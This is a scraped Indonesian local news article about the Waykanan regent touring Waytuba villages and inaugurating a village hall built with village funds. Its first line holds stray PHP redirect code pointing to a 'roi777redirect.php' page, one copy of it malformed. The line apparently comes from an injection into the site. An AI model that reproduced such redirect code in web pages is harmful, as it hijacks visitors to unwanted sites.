header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Adipati Resmikan Gedung Balai Rakyat Kampung Waytuba -
Adipati Resmikan Gedung Balai Rakyat Kampung Waytuba

TRANSLAMPUNG.COM, WAYKANAN – Bupati Waykanan Raden Adipati Surya tinjau hasil pembangunan yang menggunakan anggaran Apbd provinsi, Apbd Kabupaten serta anggaran Dana desa di kecamatan waytuba, Rabu (3/1)

Berdasarkan pantauan Translampung.com ada lima kampung yang di kunjungi oleh Bupati yaitu kampung Suma mukti, kampung Bumi Dana, kampung Way pisang, kampung Ramsai dan yang terakhir kampung Waytuba.

Dari hasil seluruh rangkaian program turun lapangan tersebut, terakhir Bupati juga meresmikan gedung Balai Rakyat yang ada di Kampung Waytuba, dana yang digunakan untuk membuat Balai Rakyat itu sebesar Rp332.683.000.Bersumber dari Anggaran dana desa kampung Waytuba tahun 2017 selain itu Bupati juga memberikan Bantuan Kitab suci Alqur’an dan permainan anak2 kepada Tk/Paud yang ada di kampung Waytuba.

Pada kesempatan itu, kepada awak media Bupati mengatakan dia ingin mengawasi dan melihat langsung hasil pembangunan yang sudah di berikan kepada masyarakat, Bupati sangat menginginkan ada nya pembangunan yang layak yang bagus yang bisa benar-benar bermanfaat bagi masyarakat.

“Saya ingin melihat langsung hasil pembangunan yang ada di seluruh kampung kampung, karena saya sangat menginginkan pembangunan yang layak, bagus, yang bisa bermanfaat langsung terhadap masyarakat,” kata Adipati.

Di tempat yang sama, kepala kampung Waytuba M. Teguh mengucapkan terimakasih kepada Bupati Waykanan karena telah berkunjung dan melihat langsung hasil pembangunan yang ada Kecamatan Waytuba khususnya di kampung Waytuba,
serta tlah meresmikan gedung Balai Rakyat kampung Waytuba.

“Kami ucapkan terimakasih kepada pak bupati karena telah datang kesini dan meresmikan gedung Balai Rakyat, mudah mudahan ini dapat bermanfaat bagi masyarakat Waytuba dan dapat mewujudkan keinginan Bupati menuju Waykanan berdaya saing 2021,” pungkas Teguh. (migo)

News Reporter